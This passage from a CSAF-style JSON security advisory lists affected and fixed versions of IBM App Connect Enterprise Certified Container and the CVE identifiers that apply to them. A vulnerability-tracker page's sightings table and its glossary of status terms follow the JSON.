"category": "product_version_range",
"name": "Certified Container \u003c13.0.7.2",
"product": {
"name": "IBM App Connect Enterprise Certified Container \u003c13.0.7.2",
"product_id": "T054533"
}
},
{
"category": "product_version",
"name": "Certified Container 13.0.7.2",
"product": {
"name": "IBM App Connect Enterprise Certified Container 13.0.7.2",
"product_id": "T054533-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:certified_container__13.0.7.2"
}
}
},
{
"category": "product_version_range",
"name": "Certified Container \u003c12.0.12.26",
"product": {
"name": "IBM App Connect Enterprise Certified Container \u003c12.0.12.26",
"product_id": "T054534"
}
},
{
"category": "product_version",
"name": "Certified Container 12.0.12.26",
"product": {
"name": "IBM App Connect Enterprise Certified Container 12.0.12.26",
"product_id": "T054534-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:certified_container__12.0.12.26"
}
}
}
],
"category": "product_name",
"name": "App Connect Enterprise"
}
],
"category": "vendor",
"name": "IBM"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-23337",
"product_status": {
"known_affected": [
"T054534",
"T054533",
"T054532",
"T054531"
]
},
"release_date": "2026-05-21T22:00:00.000+00:00",
"title": "CVE-2021-23337"
},
{
"cve": "CVE-2026-27141",
"product_status": {
"known_affected": [
"T054534",
"T054533",
"T054532",
"T054531"
]
},
"release_date": "2026-05-21T22:00:00.000+00:00",
"title": "CVE-2026-27141"
},
{
"cve": "CVE-2026-4800",
"product_status": {
"known_affected": [
"T054534",
"T054533",
"T054532",
"T054531"
]
},
"release_date": "2026-05-21T22:00:00.000+00:00",
"title": "CVE-2026-4800"
},
{
"cve": "CVE-2026-33750",
"product_status": {
"known_affected": [
"T054534",
"T054533"
]
},
"release_date": "2026-05-21T22:00:00.000+00:00",
"title": "CVE-2026-33750"
},
{
"cve": "CVE-2026-40186",
"product_status": {
"known_affected": [
"T054534",
"T054533"
]
},
"release_date": "2026-05-21T22:00:00.000+00:00",
"title": "CVE-2026-40186"
},
{
"cve": "CVE-2026-40895",
"product_status": {
"known_affected": [
"T054534",
"T054533"
]
},
"release_date": "2026-05-21T22:00:00.000+00:00",
"title": "CVE-2026-40895"
},
{
"cve": "CVE-2026-41305",
"product_status": {
"known_affected": [
"T054534",
"T054533"
]
},
"release_date": "2026-05-21T22:00:00.000+00:00",
"title": "CVE-2026-41305"
},
{
"cve": "CVE-2026-41650",
"product_status": {
"known_affected": [
"T054534",
"T054533"
]
},
"release_date": "2026-05-21T22:00:00.000+00:00",
"title": "CVE-2026-41650"
},
{
"cve": "CVE-2026-42264",
"product_status": {
"known_affected": [
"T054534",
"T054533"
]
},
"release_date": "2026-05-21T22:00:00.000+00:00",
"title": "CVE-2026-42264"
},
{
"cve": "CVE-2026-41242",
"product_status": {
"known_affected": [
"T054534",
"T054533",
"T054532",
"T054531"
]
},
"release_date": "2026-05-21T22:00:00.000+00:00",
"title": "CVE-2026-41242"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…